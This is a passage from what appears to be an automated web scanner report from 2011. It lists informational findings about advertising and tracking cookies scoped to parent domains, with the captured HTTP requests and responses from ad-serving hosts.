rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680; rdk=7856/12590; rdk15=0; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:58 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:06:58 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:06:58 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64381; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196046.js^2^1304949680^1304950018&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 14:06:58 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2210

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196046"
...[SNIP]...
9.62. http://optimized-by.rubiconproject.com/a/7858/13549/26630-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26630-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7858/13549/26630-15.js?cb=0.2465566643513739 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; ruid=154dab7990adc1d6f3372c12^8^1304807875^2915161843; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:24 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=154dab7990adc1d6f3372c12^9^1304949684^2915161843; expires=Sun, 07-Aug-2011 14:01:24 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:01:24 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:01:24 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64715; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3200915.js^1^1304949684^1304949684; expires=Mon, 16-May-2011 14:01:24 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2029

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200915"
...[SNIP]...
9.63. http://optimized-by.rubiconproject.com/a/7858/13549/26630-2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26630-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7858/13549/26630-2.js?cb=0.004363113781437278 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk=7856/12590; rdk2=0; ses2=12590^1; csi2=3196046.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:12 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:03:12 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:03:12 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^1&13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64607; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3200913.js^1^1304949792^1304949792&3196046.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 14:03:12 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2027

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200913"
...[SNIP]...
9.64. http://optimized-by.rubiconproject.com/a/7858/13549/26633-9.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26633-9.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7858/13549/26633-9.js?cb=0.8043483311776072 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=7858/13549; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:30 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:01:30 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk9=0; expires=Mon, 09-May-2011 15:01:30 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses9=13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64709; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi9=3151664.js^1^1304949690^1304949690; expires=Mon, 16-May-2011 14:01:30 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2402

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3151664"
...[SNIP]...
9.65. http://optimized-by.rubiconproject.com/a/8201/13264/25249-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8201/13264/25249-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/8201/13264/25249-15.js?cb=0.48162996326573193 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:01 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8201/13264; expires=Mon, 09-May-2011 15:03:01 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:03:01 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64618; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3200915.js^1^1304949781^1304949781&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:03:01 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2198

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200915"
...[SNIP]...
9.66. http://p.brilig.com/contact/bct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbid=AF3T0ZuAGOk4NdOmwmcHrt8jZvpqOmyTfBnhe9lXkrHzvb6m4hSMri5FOCMElW8Qz5pV2zxkbOa8; BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/plain
Date: Mon, 09 May 2011 13:59:26 GMT
Location: http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Server: Apache/2.2.16 (Ubuntu)
Set-Cookie: BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6; Domain=.brilig.com; Expires=Wed, 01-May-2041 13:59:26 GMT
X-Brilig-D: D=9657
Content-Length: 0
Connection: keep-alive

9.67. http://pix04.revsci.net/B08725/b3/0/3/1008211/17329585.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /B08725/b3/0/3/1008211/17329585.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /B08725/b3/0/3/1008211/17329585.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.orlandosentinel.com%252Fbusiness%252Fos-cfb-cover-casey-tv-20110509%252C0%252C6839926.story%253FSite%253Dorlandosentinel.com%2526channel%253DOrlando%252520Sentinel%25253Abusiness%2526keyword%253D%2526_rsiL%253D0%26DM_CAT%3DOrlando%2520Sentinel%253Abusiness%26DM_EOM%3D1&C=B08725 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_t9sN=MLvntzUpZghnJ5G+i+4DV0q7j9FMVCqRtwDvSy+4/qSYgqJKSe72X4w1OsoqG1L6pBK4c+pnxqlazyrETdH5Ss7ZqlAdp3dLz6RiXrd8bWUl0XLFTZoGRlkMvbxWlLJYvRKeW3BPG7e9ZE9B61Tr0Xu8xr7ySWl2ozQ4/U5ZrZxIJ7kQJbMCJWim30MttesFLXZH5EHs6+uRDgRTkZlnHHCB77Ar7hGyOMIesNI9o8/9RNCHjTBvKoYXcOvvnUc3gREPcmtRhgTUBzhJDfhW9iRzZqad1BMkEEMigM51rz87fTY2vzp0koSexDIeushDPwx5lSSemwqHa5nCxRqJDEJhHQKSLfJHzzuMS4QVFpr7//ar/gYMlqPHm+a7O2rKfqFedotktJgoyGoTtvvVeB1WgObPStSqC654B4pjqVzgkVcIp5vS64Z3X4Vwz7RGYuKOb0DaoyX1X76ErVivTuwcME8UIBHjBcbckhVImU4XnKI4J4bfm8SzPc7fEarHQ8eNRbt+NBqpHVfT8CA7WCswlaUKX5R2m/uP1k7D7OapV5fM7s4PFkZLVBzums11/pRTr+vH3zlZ2D1U6oJOxBq6h1nGt8lsO3aycDlfPhTnFCbJtqhd+R8M00mgvtcV2kPHAZhTBULpYa3VoOxt75s7s+OXEMD8kJDhqhAW0xOaaqojt1m2kfCd2fjCHuHb0cRul18AwkGu6zC9b5gjvQWYaAWvEuTjULQnF3/WBu3xoBmBW78cFOqZVsnCJpwlzNwpDnZ/nr094/gLpsTcBz9U0VyWch6xgNeriVs3uCZ+hcbdM5qZSIVPm40FjrdWmJOt2Ypv3a/kl5qli5IOjokQLYqfkHaXdYfke+D9DK5fPp0x3F/DMW5VklD0s2klQ6FvQ8nGV4uNs6prIO+bLFyIVZRDiExpXuh+i+Aq1YmAP/ufHvFjsYKn3OEk5XDAygQ1YpMtM5Sk37DHiy1Oc7bt3PwrwRKxpdfhkxPbOgtaPJkKIgXA1UHBSrD2OZEGtvDFWcANJwDR0VNWid5NgBAB0rwWy6Z9LlselJpaiIgXIaF5h7wv7cU7Y0uZfy2iNM4rSYzqVMnAijA51U4o2W5ntA6EoeSq35Bx9QMDeHIURaKeaZsajRx5lGVOxUpye6PvZN0uuGaga4RrhslZMB2Y9+AWtEFXlROcqQmBVEWszH66koC2U73qDz/yRQrV2HzX7gNGvoPo58JQSjatu9X7ji5cy1E8461WWwOgVp2IkrMWGs11l2+HIs523HQXWBw52AChb40Qk34XWJQuyHfZL9BKo9bD6pY3NmKKLrvbGYtN9z9spKNvqELg64UUhZHAp4leheD4a45ZJaEWok/2mPfmsjSGHyI+cNW11/VKbLveqgLdpHuwgIOrGn+E8XL1rY/dmTnJljXVje3GS73qe0gFIUORmV3zEUoMu8lptwsGFRNaLlIlfH4o/sxxcLaUBc19572hk00yHldk+1d96w8WPNpYQKcbuFCWBQC1EktKTN64aS3+Ym84VuWwrnmLsUd+YZBuBFuReQ3pxDY7f9Wawu8mnlboSNWsLrjMJt5gOyEZGvTAlzDiB1dDEroCTz/E9E4GpyJPKfuKLsHuCzLY21x7DZuu5S8mZ7fh28cQxt+2YLsEHn6UBTWD6KoqxACfoIaPep7kzEs=; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsiPus_oJ6I="MLsXrqEO5ihr4JB0esFCP3iTwKJkgx2gQRTIgLpbO5bzUKo5agSRamM8BUBiXf5iQVJE/qvOLDxrtPlWva+WFfRLnrsgVEgRJznRYvE/JCbIJlFRZ0v8lk2FMP7VgY0aDJ1uvr3sxbowAuFyRMBuLfYcr6fFEv89nuq04UGKmDchPxvf1VTgDWJTEx5Kkr8jzQunm+6oPneCoGtSQhyGHZzxdfyY9pzlPM/onuX9X2JdmNFRliGjpOxxE+0pD+DBZZWgpAquHQkJ1YB5V5px1bD3K+pKttxiYRyYsLRuin4AdpE+D57tHyWhDKXYnaxmhDlbT40RVZTlQWa5SHr/yRW15cgoL2BTNz4ZHIOIbZ3w+GOVtetiHdAwjqA5Ui4WrA6bK25LLI4Ir9sIh2o24VUvkbMIaqCDNsF2jNanIWOT86v7ILEO8GTv7ysgdBPV7GNAhaATIC6+9HWKklodYgNie3KEsyxp4Ip53yIQktBt7x0rOG5/65JnmRP6pZbn0beJZ9e2WzN097dXeixXnHdq6JFVAyAbmpVkkwNOY+wWd6dg4Jf/QXM8CJVkFVKLOlMwzlBml/4yW2mwTMAgsUWTbJEe3D5h5Qu+avLmgFYgCdm3afOE65XEGgbY6gQI2QyUKfE89OzxvQEeuV8Z29PLI2LFlmgFNy3CKVxZ5PwiIOfTemnz/u34vuwdvk5OwPoIKx6wc64f4XUyQCxKRAMtrDlD3lqOkddwPiQPQWSdxvqE7+8qAf4lJEA0RdLVS+EOIKQcs4IiqbmLClAFvanxVnt8+DAJ/at8TweJdiurVsUJ39ifvys0hlSV/6J8xDBFRvnTXW7RHu077j5I8EhkX0VLoUvlsoHLXJRFSkMMdD1Rjk6kj6u7MTXab7InNjSHU6mj9FV6J71+hVaENmvO6xRYxe8DwuUoxcZGfl++Mz5gpSVkriCBhEEVGAa0whhl40WBypkKGx6ytK8eGBxCHtMy7YXpAt8GVfXO2nHdDF5NRbljpX5a2idAiaY9hZRKaSwdCl0zO8qy8rZheiOX4dGOkvvILbHnPIk="; rsi_us_1000000="pUM1Iz9HMAYU1O2WQ6agQvHtomeqiTx+scbgotrS/irrnp9hR1uXbUVk0H3WxoeLl/xLNe9VpQo58/SfnwRIVPklZlA8PnoYUYWIbDUqYS9zQYnZsUoP3QRkponkl0tHHb8kkKwgkXBko7XOn1jpgcgJQ3/+sBnkvl0R76S9Yt1TpYoxEcshze8XSI9IYwGJZAQM8acKU6QFRiQuOSfWyKPrE4VIXPPwX8RUWiY/UssOCRqN2G4sqarRk4NsaJRnlj2K1Y5HUKhRsrHbW1pTdRNtT9ZKulZhziyboYdrEO2sarAl/MFVZsjwi/Wv3qLm1Fs/xHiIfiPD8ptaFv53hhEy0x9Nzgra6z5i1sNDBdwC2AMM5jmRxk1HiSJ7rc7geNXoMpcoW5lazev62kFjic7GRlCPMyreliDoEbRStv8bUX0hzqBtlrJJ71XkLAtbR3bp3YXVlT/i03+GD+X4pnqR31ooqOicd/3sY/HfyHpsfYFpK+9cKfsOK0TMqmEZgg6TVATszTa6DVBy+9HIW60cgGORBfFeA3V7ZWrc7A/f4TCz6oav7WuUpl/8FU3EZiYlcqNpGIiqu0EDyUFyBc0Mm83cLtn7n1YkzNAWKjM3BMlNOvL7luAFxGav7veb18OL8FnDLIcc98IdSjePgO4x+TnvWMc1o3LMnx7KFnEVNL/zr/l7lPtA+JVzT7cnj2wyE4QaQHKh6Ok04D+HbZpnYVGPcUhH7ir4iXn1X1fRi2WC4X27+2MYNn6XJpgOOB6hxeYRKJezFPVyYHA0E8k8Y6vPmqAzcUQ1GgmrtVMO5TynL7MxkjlDhd/qkAAADTkEWFYjM+71vkik63NbiYJzNhUruoYNDY4+Cdad8nntQwYFdaZi2z0oTqrM2W9VLHxiO/W3OZ/DoHhIVOR05q3qEJsSQqz4HlTPFqdP6tMOPEdT2mlN6I+snoH5H1+95/20PTZV63bqPslFDdpjQUzOUzlGEQz5vlwfpcobNG6ZffmcfXkVRA90ZS5vDX6RoLFO4jXs4PfHmOaxRujzc+ZZx71yBGG4cW6a